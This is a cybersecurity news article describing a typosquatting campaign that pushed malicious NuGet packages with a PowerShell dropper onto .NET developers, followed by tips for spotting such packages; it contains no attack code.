There is a concerning trend among cybercriminals targeting individuals working with the .NET framework using a sneaky tactic called typosquatting.
This involves creating fake packages that mimic the names of legitimate software and distributing them through the popular NuGet repository.
Cybersecurity researchers Natan Nehorai and Brian Moussalli from JFrog have detected this ongoing campaign involving malicious software distribution through fraudulent packages.
In just one month, three of these packages have been downloaded more than 150,000 times. The extensive downloads of malicious NuGet packages could indicate many compromised systems among .NET developers.
However, it is also possible that the cybercriminals behind this attack deliberately sought to legitimize their fake packages by artificially inflating download numbers.
By creating fake profiles on the NuGet repository that mimicked the names of Microsoft software developers who work on the NuGet .NET package manager, the attackers attempted to deceive users into thinking that the packages were legitimate.
Malicious Packages Discovered
There are a number of NuGet packages that contain the same malicious payload that experts have determined:-
The malicious packages distributed through the fraudulent NuGet repository contain a PowerShell-based dropper script called init.ps1, designed to download and execute on the targeted machine.
Once the script is executed, it configures the infected system to allow PowerShell execution without any restrictions, effectively granting the attackers unrestricted access to the system.
After executing the PowerShell-based dropper script, the malicious packages download and launch a second-stage payload. This payload is a custom-built Windows executable designed specifically for this attack.
The malware that is deployed on compromised systems is capable of carrying out various malicious activities.
Spotting Malicious NuGet Packages
Here below, we have mentioned all the key points:-
- A developer’s first responsibility should be to ensure they do not import or install packages with typos.
- Certain packages employ a tactic where they imitate the names of established and reputable packages, expecting that a programmer may unintentionally incorporate them into their project or specify them as a requirement.
- Users can also safeguard themselves against installing potentially harmful packages by carefully inspecting the installation and initialization scripts for any suspicious code or activity.
- Keep an eye out for scripts that will retrieve and execute resources from external sources when you run them.
- Ensure no scripts or binary files are mistakenly executed when downloading the package locally.
- The low download count of a relatively new package may indicate a risk.
The current attack is just one aspect of a wider-ranging, malicious campaign. This campaign involves multiple attackers who have taken the bold step of uploading over 144,000 packages related to phishing onto various open-source package repositories.
Building Your Malware Defense Strategy – Download Free E-Book